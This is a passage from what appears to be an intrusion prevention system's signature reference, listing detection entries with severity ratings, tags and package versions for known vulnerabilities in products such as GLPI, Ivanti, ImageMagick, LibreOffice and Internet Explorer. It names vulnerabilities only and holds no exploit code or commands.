About this situation: An attempt to exploit a vulnerability in GLPI-Project GLPI detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GLPI, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1616-5242
Vulnerability: GLPI-Inventory-Agent-SQL-Injection
Description:
Back to top

File-TextId_GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727

About this situation: An attempt to exploit a vulnerability in GLPI detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GLPI, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1674-5242
Last changed: sgpkg-ips-1674-5242
Vulnerability: GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727
Description:
Back to top

File-TextId_GnuPG-Message-Packet-Length-Handling-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Free Software Foundation GnuPG detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GnuPG, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: GnuPG-Message-Packet-Length-Handling-Integer-Overflow
Description:
Back to top

File-TextId_Google-Chrome-Blink-Buildshadowandinstancetree-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-Blink-Buildshadowandinstancetree-Use-After-Free
Description:
Back to top

File-TextId_Google-Chrome-Multiple-File-Type-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-487-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-Multiple-File-Type-Security-Bypass
Description:
Back to top

File-TextId_GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Any Software, MS2024-10, CVE2024, Windows not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1744-5242
Vulnerability: GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572
Description:
Back to top

File-TextId_Hex-Encoded-Script-Data-Content

About this situation: Suspicious traffic detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1349-5242
Last changed: sgpkg-ips-1349-5242
Description:
Back to top

File-TextId_Hikvision-Command-Injection-CVE-2021-36260

About this situation: An attempt to exploit a vulnerability in Hikvision detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Hikvision, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
Vulnerability: Hikvision-Command-Injection-CVE-2021-36260
Description:
Back to top

File-TextId_HPE-Insight-Remote-Support-Processatatchmentdatastream-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HPE Insight Remote Support detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HPE Insight Remote Support, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: HPE-Insight-Remote-Support-Processatatchmentdatastream-Directory-Traversal
Description:
Back to top

File-TextId_HPE-Insight-Remote-Support-XML-External-Entity-Injection-CVE-2024-53675

About this situation: An attempt to exploit a vulnerability in HPE Insight Remote Support detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HPE Insight Remote Support, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: HPE-Insight-Remote-Support-XML-External-Entity-Injection-CVE-2024-53675
Description:
Back to top

File-TextId_IBM-Forms-Viewer-Xfdl-Form-Processing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Forms Viewer detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Forms Viewer, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-563-5211
Vulnerability: IBM-Forms-Viewer-Xfdl-Form-Processing-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Informix Client SDK detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Connect, IBM Informix Client SDK, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Domino detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Domino, Any Operating System not specific, Lotus Domino not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Notes detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Notes, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow
Description:
Back to top

File-TextId_IBM-Lotus-Notes-MIF-Attachment-Viewer-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Lotus Notes detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Lotus Notes, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: IBM-Lotus-Notes-MIF-Attachment-Viewer-Buffer-Overflow
Description:
Back to top

File-TextId_IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow

About this situation: Buffer overflow exploit against UUE file handling vulnerability in the attachment viewer of IBM Lotus Notes
Context: Identified Text File Stream
Severity: 7
Tags: Windows, x86, Lotus Notes, CVE2005, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: SMTP-IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow
Description:
Back to top

File-TextId_IBM-WebSphere-Application-Server-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in IBM WebSphere Application Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM WebSphere Application Server, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-705-5211
Vulnerability: IBM-WebSphere-Application-Server-Remote-Code-Execution
Description:
Back to top

File-TextId_IBM-WebSphere-Application-Server-Remote-Code-Execution-2

About this situation: An attempt to exploit a vulnerability in IBM WebSphere Application Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM WebSphere Application Server, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: IBM-WebSphere-Application-Server-Remote-Code-Execution
Description:
Back to top

File-TextId_Imagemagick-Authenticate-Command-Injection

About this situation: An attempt to exploit a vulnerability in ImageMagick Studio ImageMagick detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Vulnerability: Imagemagick-Authenticate-Command-Injection
Description:
Back to top

File-TextId_Imagemagick-PDF-And-PostScript-Image-Ghostscript-Command-Injection

About this situation: An attempt to exploit a vulnerability in ImageMagick detected.
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1435-5242
Vulnerability: Imagemagick-PDF-And-PostScript-Image-Ghostscript-Command-Injection
Description:
Back to top

File-TextId_Imagemagick-Shell-Character-Filtering-Code-Execution

About this situation: Detected attempt to exploit a vulnerability in ImageMagick
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-1401-5242
Vulnerability: Imagemagick-Shell-Character-Filtering-Code-Execution
Imagemagick-Popen-Shell-Character-Filtering-Code-Execution
Description:
Back to top

File-TextId_Inductive-Automation-Ignition-Abstractgatewayfunction-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Inductive Automation Ignition detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Inductive Automation Ignition, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1631-5242
Last changed: sgpkg-ips-1693-5242
Vulnerability: Inductive-Automation-Ignition-Abstractgatewayfunction-Insecure-Deserialization
Description:
Back to top

File-TextId_Inductive-Automation-Ignition-Base64element-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Inductive Automation Ignition detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Inductive Automation Ignition, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1704-5242
Last changed: sgpkg-ips-1704-5242
Vulnerability: Inductive-Automation-Ignition-Base64element-Insecure-Deserialization
Description:
Back to top

File-TextId_Inductive-Automation-Ignition-ModuleInvoke-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Inductive Automation Ignition detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Inductive Automation Ignition, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1692-5242
Last changed: sgpkg-ips-1692-5242
Vulnerability: Inductive-Automation-Ignition-ModuleInvoke-Insecure-Deserialization
Description:
Back to top

File-TextId_Inductive-Automation-Ignition-runQuery-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Inductive Automation Ignition detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Inductive Automation Ignition, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1698-5242
Last changed: sgpkg-ips-1698-5242
Vulnerability: Inductive-Automation-Ignition-runQuery-Insecure-Deserialization
Description:
Back to top

File-TextId_Interactive-Data-Esignal-StyleTemplate-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Interactive Data eSignal detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Interactive Data eSignal, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-425-4219
Last changed: sgpkg-ips-570-5211
Vulnerability: Interactive-Data-Esignal-StyleTemplate-Buffer-Overflow
Description:
Back to top

File-TextId_Internet-Explorer-Memory-Corruption-CVE-2018-8249

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2018-06, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1076-5242
Vulnerability: Internet-Explorer-Memory-Corruption-CVE-2018-8249
Description:
Back to top

File-TextId_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2017-07, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1661-5242
Last changed: sgpkg-ips-1661-5242
Vulnerability: Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594
Description:
Back to top

File-TextId_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8619

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-12, CVE2018, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1770-5242
Vulnerability: Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8619
Description:
Back to top

File-TextId_Internet-Explorer-Use-After-Free-CVE-2013-3118

About this situation: A vulnerability in Internet Explorer
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-526-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3118
Description:
Back to top

File-TextId_Internet-Shortcut-File-MHTML-URL-Prefix

About this situation: Internet Shortcut file with an mhtml prefix in the URL detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-07, CVE2024, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1752-5242
Vulnerability: Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112
Description:
Back to top

File-TextId_Internet-Shortcut-File-Transfer

About this situation: Internet shortcut file transfer
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1755-5242
Last changed: sgpkg-ips-1846-5242
Description:
Back to top

File-TextId_Ivanti-Avalanche-Smartdeviceserver-Connectservlet-Xml-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1710-5242
Last changed: sgpkg-ips-1710-5242
Vulnerability: Ivanti-Avalanche-Smartdeviceserver-Connectservlet-Xml-External-Entity-Injection
Description:
Back to top

File-TextId_Ivanti-Connect-Remote-Code-Execution-Chain-CVE-2024-21893-CVE-2024-21887

About this situation: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Context: Identified Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Ivanti Connect Secure, CVE2024, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1687-5242
Last changed: sgpkg-ips-1687-5242
Vulnerability: Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893
Ivanti-Connect-Secure-Command-Injection-Vulnerability-CVE-2024-21887
Description:
Back to top

File-TextId_Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893

About this situation: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Connect Secure, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1687-5242
Last changed: sgpkg-ips-1688-5242
Vulnerability: Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893
Description:
Back to top

File-TextId_Ivanti-Endpoint-Manager-EFile-CreateFile-Directory-Traversal

About this situation: A vulnerability in Ivanti Endpoint Manager detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Ivanti-Endpoint-Manager-EFile-CreateFile-Directory-Traversal
Description:
Back to top

File-TextId_Ivanti-Endpoint-Manager-Escript-Getfilepath-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Ivanti-Endpoint-Manager-Escript-Getfilepath-Directory-Traversal
Description:
Back to top

File-TextId_Ivanti-Endpoint-Manager-Etask-Waspreviouslymapped-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1799-5242
Last changed: sgpkg-ips-1799-5242
Vulnerability: Ivanti-Endpoint-Manager-Etask-Waspreviouslymapped-SQL-Injection
Description:
Back to top

File-TextId_Ivanti-Endpoint-Manager-Eventhandler.asmx-Recordbrokenapp-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1745-5242
Last changed: sgpkg-ips-1745-5242
Vulnerability: Ivanti-Endpoint-Manager-Eventhandler.asmx-Recordbrokenapp-SQL-Injection
Description:
Back to top

File-TextId_Ivanti-Endpoint-Manager-Importxml-XML-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Vulnerability: Ivanti-Endpoint-Manager-Importxml-XML-External-Entity-Injection
Description:
Back to top

File-TextId_Ivanti-Endpoint-Manager-Vulcore-Getdbvulnerabilities-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1784-5242
Vulnerability: Ivanti-Endpoint-Manager-Vulcore-Getdbvulnerabilities-SQL-Injection
Description:
Back to top

File-TextId_Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatchproducts-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
Vulnerability: Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatchproducts-SQL-Injection
Description:
Back to top

File-TextId_Java-Web-Start

About this situation: A Java-related file transfer was detected
Context: Identified Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-473-5211
Last changed: sgpkg-ips-487-5211
Vulnerability: Java-Related-File-Transfers
Description:
Back to top

File-TextId_Java-Web-Start-Jnlp-File-Argument-Injection

About this situation: An attempt to exploit a vulnerability in Sun Microsystems JRE detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: HTTP_Sun-Java-Web-Start-Jnlp-File-Argument-Injection
Description:
Back to top

File-TextId_JavaScript-In-SMIL-XSS

About this situation: Javascript detected in Smil
Context: Identified Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, RealPlayer, CVE2003, Any Operating System not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: RealNetworks-RealPlayer-SMIL-XSS
Description:
Back to top

File-TextId_Jenkins-Filesystem-Trigger-Plugin-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Jenkins Filesystem Trigger Plugin detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Vulnerability: Jenkins-Filesystem-Trigger-Plugin-External-Entity-Injection
Description:
Back to top

File-TextId_JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1568-5242
Last changed: sgpkg-ips-1568-5242
Vulnerability: JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
Description:
Back to top

File-TextId_Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262

About this situation: An attempt to exploit a vulnerability in Kingsoft WPS Office detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Kingsoft WPS Office, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
Vulnerability: Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262
Description:
Back to top

File-TextId_LibreOffice-And-OpenOffice-ODF-Document-Printersetup-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OpenOffice detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-726-5211
Vulnerability: LibreOffice-And-OpenOffice-ODF-Document-Printersetup-Integer-Underflow
Description:
Back to top

File-TextId_LibreOffice-EmbeddedFontsHelper-Directory-Traversal-CVE-2024-12425

About this situation: An attempt to exploit a vulnerability in LibreOffice LibreOffice detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibreOffice, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Vulnerability: LibreOffice-EmbeddedFontsHelper-Directory-Traversal-CVE-2024-12425
Description:
Back to top

File-TextId_LibreOffice-Librelogo-Arbitrary-Code-Execution

About this situation: An attempt to exploit a vulnerability in LibreOffice detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibreOffice, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1180-5242
Vulnerability: LibreOffice-Librelogo-Arbitrary-Code-Execution
Description:
Back to top

File-TextId_LibreOffice-Macro-Event-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in LibreOffice detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibreOffice, Apache OpenOffice, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: LibreOffice-Macro-Event-Remote-Code-Execution
Description:
Back to top

File-TextId_LibreOffice-Webservice-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in LibreOffice detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibreOffice, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1071-5242
Vulnerability: LibreOffice-Webservice-Information-Disclosure
Description:
Back to top

File-TextId_Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in XMLSoft Libxml2 detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Libxml2, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Multiple-Products-Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
Description:
Back to top

File-TextId_MacOS-Suspicious-Shortcut-File

About this situation: An attempt to exploit a vulnerability in macOS detected
Context: Identified Text File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2023, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1667-5242
Vulnerability: Atlassian-Companion-Remote-Code-Execution-CVE-2023-22524
Description:
Back to top

File-TextId_Magento-API-Unserialize-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Magento Magento detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Magento, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-825-5242
Last changed: sgpkg-ips-825-5242
Vulnerability: Magento-API-Unserialize-Remote-Code-Execution
Description:
Back to top

File-TextId_Malicious-Internet-Shortcut-File

About this situation: A malicious internet shortcut file was detected
Context: Identified Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1802-5242
Last changed: sgpkg-ips-1832-5242
Vulnerability: Malicious-Internet-Shortcut-File
Description:
Back to top

File-TextId_Microsoft-.NET-And-Oracle-Java-SE-Xml-Digital-Signature-Spoofing

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework or Oracle Java SE detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, Oracle Java Runtime Environment, MS2013-05, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-529-5211
Vulnerability: Microsoft-.NET-Framework-Xml-Digital-Signature-Spoofing
Oracle-Java-SE-XML-Digital-Signature-Spoofing
Description:
Back to top

File-TextId_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2015-11, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-705-5211
Vulnerability: Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
Description:
Back to top

File-TextId_Microsoft-.NET-Framework-Heap-Corruption-CVE-2012-0015

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2012-02, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-818-5242
Last changed: sgpkg-ips-818-5242
Vulnerability: Microsoft-.NET-Framework-Heap-Corruption-CVE-2012-0015
Description:
Back to top

File-TextId_Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2012-06, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
